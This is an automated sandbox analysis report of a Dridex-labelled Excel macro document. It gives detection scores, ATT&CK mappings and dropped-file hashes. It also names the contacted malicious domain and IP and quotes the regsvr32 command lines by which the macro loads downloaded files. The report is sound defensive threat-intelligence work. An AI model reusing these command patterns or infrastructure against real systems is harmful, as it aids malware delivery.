Analysis Report Dridex-06-bc1b.xlsm

Overview

General Information

Sample Name:Dridex-06-bc1b.xlsm
Analysis ID:344478
MD5:f72f88ebdf048fdfedf0aa3e298d9e71
SHA1:b8ea58415338bed65d4cd194ead6ac663ad71a6c
SHA256:78ccf25ecee02f759cefa6b1c29a00fb4ce64c000f7b9c04c1fc08e04d04bc1b

Detection

Hidden Macro 4.0
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 252 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2512 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2400 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\SD120E\EP146E\960. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2304 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\QP101F\TL941X\960. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  • Command: 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.
  • CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.
  • CommandLine|base64offset|contains:
  • Image: C:\Windows\System32\regsvr32.exe
  • NewProcessName: C:\Windows\System32\regsvr32.exe
  • OriginalFileName: C:\Windows\System32\regsvr32.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 252
  • ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.
  • ProcessId: 2512

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Dridex-06-bc1b.xlsm | Avira: detected
Multi AV Scanner detection for domain / URL
Source: compagniamaestro.com | Virustotal: Detection: 13%
Multi AV Scanner detection for submitted file
Source: Dridex-06-bc1b.xlsm | Virustotal: Detection: 50%
Source: Dridex-06-bc1b.xlsm | ReversingLabs: Detection: 58%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 199.192.21.36:443 -> 192.168.2.22:49167 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic | DNS query: name: compagniamaestro.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 199.192.21.36:443
Source: Joe Sandbox View | IP Address: 199.192.21.36
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\841CAADE.emf
Source: unknown | DNS traffic detected: queries for: compagniamaestro.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000003.00000002.2105763000.0000000001DB0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2106436897.0000000001C30000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107554860.0000000001D70000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: 960.0.dr | String found in binary or memory: https://crbug.com/740629)
Source: 960.0.dr | String found in binary or memory: https://github.com/google/closure-compiler/issues/544
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | HTTPS traffic detected: 199.192.21.36:443 -> 192.168.2.22:49167 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 | Screenshot OCR: Enable Macros Disable Macros Opening: x|sm.sheet,csv, Press ESC to cancel. a @1 iGi %10 m '00
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Foglio1, Function PagamentoDocumento, API Run("Auto_io22") | Name: PagamentoDocumento
Found Excel 4.0 Macro with suspicious formulas
Source: Dridex-06-bc1b.xlsm | Initial sample: CALL
Source: Dridex-06-bc1b.xlsm | OLE, VBA macro line: Private Sub pagoUno_Layout()
Source: VBA code instrumentation | OLE, VBA macro: Module Foglio1, Function pagoUno_Layout | Name: pagoUno_Layout
Source: Dridex-06-bc1b.xlsm | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal92.expl.evad.winXLSM@7/16@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Dridex-06-bc1b.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD873.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: Dridex-06-bc1b.xlsm | Virustotal: Detection: 50%
Source: Dridex-06-bc1b.xlsm | ReversingLabs: Detection: 58%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\SD120E\EP146E\960.
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\QP101F\TL941X\960.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\SD120E\EP146E\960.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\QP101F\TL941X\960.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Dridex-06-bc1b.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: Dridex-06-bc1b.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
Source: Dridex-06-bc1b.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Dridex-06-bc1b.xlsm | Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 22 | Path Interception | Process Injection 1 | Masquerading 1 | OS Credential Dumping | File and Directory Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | System Information Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 22 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer 1 | SIM Card Swap |  | Carrier Billing Fraud

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Dridex-06-bc1b.xlsm | 51% | Virustotal |
Dridex-06-bc1b.xlsm | 5% | Metadefender |
Dridex-06-bc1b.xlsm | 59% | ReversingLabs | Document-Word.Trojan.Ursnif
Dridex-06-bc1b.xlsm | 100% | Avira | W2000M/Agent.1970033

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
compagniamaestro.com | 13% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://crbug.com/740629) | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
compagniamaestro.com | 199.192.21.36 | true | true |  | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://crbug.com/740629) | 960.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/google/closure-compiler/issues/544 | 960.0.dr | false |  | high
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2105763000.0000000001DB0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2106436897.0000000001C30000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107554860.0000000001D70000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.192.21.36 | unknown | United States | 22612 | NAMECHEAP-NETUS | true

    General Information

    Joe Sandbox Version:31.0.0 Emerald
    Analysis ID:344478
    Start date:26.01.2021
    Start time:16:15:51
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 19s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Dridex-06-bc1b.xlsm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal92.expl.evad.winXLSM@7/16@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 95.101.27.163, 95.101.27.142, 8.241.122.126, 8.248.149.254, 67.27.159.254, 67.27.158.254, 8.241.9.254
    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtDeviceIoControlFile calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

Match | Associated Sample Name / URL | Detection
199.192.21.36 | n830467925857.xlsm | malicious
199.192.21.36 | Fattura_25785.xlsm | malicious
199.192.21.36 | Fattura_20070.xlsm | malicious
199.192.21.36 | Fattura_26645.xlsm | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
compagniamaestro.com | n830467925857.xlsm | malicious | 199.192.21.36
compagniamaestro.com | Fattura_25785.xlsm | malicious | 199.192.21.36
compagniamaestro.com | Fattura_20070.xlsm | malicious | 199.192.21.36
compagniamaestro.com | Fattura_26645.xlsm | malicious | 199.192.21.36

                    ASN


                    JA3 Fingerprints


                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\LO400F\PI909U\960
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):45017
                    Entropy (8bit):5.1653486867978575
                    Encrypted:false
                    SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                    MD5:4B04126D788D6958C2C62DCE6FE37988
                    SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                    SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                    SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                    Malicious:true
                    Reputation:low
                    Preview: ..<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>.. <meta charset="utf-8">.. <title>Reported Unsafe Site: Navigation Blocked</title>.. <style>/* Copyright (C) Microsoft Corporation. All rights reserved... * Use of this source code is governed by a BSD-style license that can be.. * found in the LICENSE file. */....html, body {.. margin: 0;.. padding: 0;.. font-family: system-ui, sans-serif;.. /* Setting font-size to 62.5% so that 1 rem = 10px. */.. font-size: 62.5%;..}....#Wrapper {.. margin-left: auto;.. margin-right: auto;.. max-width: 600px;.. padding-top: 4.8rem;.. padding-left: 4.8rem;.. padding-right: 4.8rem;.. padding-bottom: 3.2rem;..}....#branding {.. font-size: 1.2rem;.. margin-top: 0.9rem;..}.....branding-ltr {.. text-align: right;..}.....branding-rtl {.. text-align: left;..}.....red {.. background-color: #b80000..}.....whiteFont {.. color: #ffffff !important;..}.....white-pushbutton {.. display: inline-block;.. font-size: 1.5rem;.
                    C:\QP101F\TL941X\960
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):45017
                    Entropy (8bit):5.1653486867978575
                    Encrypted:false
                    SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                    MD5:4B04126D788D6958C2C62DCE6FE37988
                    SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                    SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                    SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                    Malicious:false
                    Reputation:low
                    C:\SD120E\EP146E\960
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):45017
                    Entropy (8bit):5.1653486867978575
                    Encrypted:false
                    SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                    MD5:4B04126D788D6958C2C62DCE6FE37988
                    SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                    SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                    SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                    Category:dropped
                    Size (bytes):58936
                    Entropy (8bit):7.994797855729196
                    Encrypted:true
                    SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                    MD5:E4F1E21910443409E81E5B55DC8DE774
                    SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                    SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                    SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                    Malicious:false
                    Reputation:high, very likely benign file
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Reputation:high, very likely benign file
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):3.123186963792904
                    Encrypted:false
                    SSDEEP:6:kKrZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:SkPlE99SNxAhUegeT2
                    MD5:7E0054FA6C074543BC9B37D934E8D2DF
                    SHA1:BF35F8FEE206925C323B66BCE8E35582F97AA141
                    SHA-256:DBE4735D4110A227E4A873ADC52C6A58A80929FF1B260ED44E300AF874586F2C
                    SHA-512:844BCD48869A7590E9D4B914F1654551A10B87E314C06633C48A484501E17B7DA8F80269AFA18539F7BE5DF19ACFF13BDF1D9A0414A14BD6088C043940AAE1F6
                    Malicious:false
                    Reputation:low
                    Preview: p...... ........~{..A...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):3.0294634724686764
                    Encrypted:false
                    SSDEEP:3:kkFklJxkSfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK4kIliBAIdQZV7eAYLit
                    MD5:515ABC50F072563813F74B645FAA09D5
                    SHA1:5140FDCA9F17840721C22BEA2AF5B78EBA18C08E
                    SHA-256:BC1FB59C03A1BC54D0EF895C91E04B0BFD80CA55D3CA39BC311B3899EA94087B
                    SHA-512:8CEB5158E12F4D9B05EFC5C80F73F20E9CA189C02CACB2EF111414B724AB25C42C4B751956BB60C7B49DCBBA7ADB6E3C8052574AF6E57D0303B294B41DFCAA81
                    Malicious:false
                    Reputation:low
                    Preview: p...... ....`......A...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\MAS3QXWU.htm
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                    Category:downloaded
                    Size (bytes):45017
                    Entropy (8bit):5.1653486867978575
                    Encrypted:false
                    SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                    MD5:4B04126D788D6958C2C62DCE6FE37988
                    SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                    SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                    SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                    Malicious:false
                    Reputation:low
                    IE Cache URL:https://compagniamaestro.com/
                    Preview: ..<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>.. <meta charset="utf-8">.. <title>Reported Unsafe Site: Navigation Blocked</title>.. <style>/* Copyright (C) Microsoft Corporation. All rights reserved... * Use of this source code is governed by a BSD-style license that can be.. * found in the LICENSE file. */....html, body {.. margin: 0;.. padding: 0;.. font-family: system-ui, sans-serif;.. /* Setting font-size to 62.5% so that 1 rem = 10px. */.. font-size: 62.5%;..}....#Wrapper {.. margin-left: auto;.. margin-right: auto;.. max-width: 600px;.. padding-top: 4.8rem;.. padding-left: 4.8rem;.. padding-right: 4.8rem;.. padding-bottom: 3.2rem;..}....#branding {.. font-size: 1.2rem;.. margin-top: 0.9rem;..}.....branding-ltr {.. text-align: right;..}.....branding-rtl {.. text-align: left;..}.....red {.. background-color: #b80000..}.....whiteFont {.. color: #ffffff !important;..}.....white-pushbutton {.. display: inline-block;.. font-size: 1.5rem;.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\841CAADE.emf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):1976
                    Entropy (8bit):1.9759705070369498
                    Encrypted:false
                    SSDEEP:12:Yn9e/kaHslqLYp0FIQ4+P/k1EijBdShS8u1NnNlou1NRztDAcqdckgDWojkMXNVf:YniVH9a0x4I8BAKNHoKNfDn9tUs0zCp
                    MD5:1C7221B8A7104792FDEEA41E5D7BA0D0
                    SHA1:D49122E2BF94D92ED067570D638B672855C05893
                    SHA-256:76F287B1E3251B7E0E5BA27BFB05B35831150CC665DE00F9FD2D807E2D2A028D
                    SHA-512:928EF6FCCDB96A4AADD35D36171F3D09DE5605A70FE505862A294F089FEF53E697426017D3973B9BCAFF8D579A8A85C38943DCF47C5C5DD1187AB1A20D50E473
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1372147.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 650 x 85, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1005
                    Entropy (8bit):7.551834228633037
                    Encrypted:false
                    SSDEEP:24:aB2uoC0w2bONUV99upE4ZXn8bf4F0T+xAlO6y:BuoBwawUV99/4ZXn8bT6AOf
                    MD5:DA5C67B7042BB04E6BFB9F60D9470287
                    SHA1:BFBDC4596111EF5D95183DB0526353CBCA84C43F
                    SHA-256:0522D7C7600F1DD56346450DFE1466BA51CFEBCD095CD3154FB30DC563F96763
                    SHA-512:D16BCF49A56F0FB926DB7C8DA413A976E1D0F53DA5EA73B729A5D11FFCF42FA149D17D3587A3DF56665C6CAAC44F903CA5D0278DCFDA8FE3C43318724C3507EE
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6FDFA9C.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 415 x 291, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):5305
                    Entropy (8bit):7.83628317482236
                    Encrypted:false
                    SSDEEP:96:ndsgj5y6EGgWKW/WkPsLhsKto+bDOukamzejtjcF+6QTzys5kcWCgupHLib:ndsgjI6RdKcXOn9b9vmUgs6QXys+NYW
                    MD5:31F86AA3BD1ADA53D99B7BBEF6A1DEFC
                    SHA1:148331C2D5EB437437D48ABE51866384D7154044
                    SHA-256:E0EC55345EDC7EF4BBE4F20ABD6F8FE965475C632766FAE6CA1853674F2DC34C
                    SHA-512:96D1DC354DCB3A262B997A98E83A0162F0F9E93050C7BC952B46FB886336C1C6370B3D5A9316039FD84211161F34BA3A866B8DFD385323551743674A24FF7B39
                    Malicious:false
                    C:\Users\user\AppData\Local\Temp\9DFE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):43608
                    Entropy (8bit):7.775661687189793
                    Encrypted:false
                    SSDEEP:768:w0PwCVsTx8txX/vR1IUfSQVg4MMOo0JzAcTlrz5RzXO+iFoWZxeh9E9S:w0PHsdgFXffDOo0JzAC1t++UoWZxeh9D
                    MD5:4729F4D4D3E6A40897714474BD193698
                    SHA1:1732E41AD6A7A026F51541AF370BBEDDC3C29192
                    SHA-256:BBC203190FCC1C1C9B14E09A5A17DB8C20DFF8792DFA2F75387C66C93D36AADB
                    SHA-512:0CCFECDADDBA30755CF5BE0F4AD460E0DB09EB9F52EADBFF8D519F4D8962322B0CB520E75CAE03569389AF3903B9C1C0579F9EC4B785B1B2BBF1E6ED60743632
                    Malicious:false
                    C:\Users\user\AppData\Local\Temp\CabF70C.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                    Category:dropped
                    Size (bytes):58936
                    Entropy (8bit):7.994797855729196
                    Encrypted:true
                    SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                    MD5:E4F1E21910443409E81E5B55DC8DE774
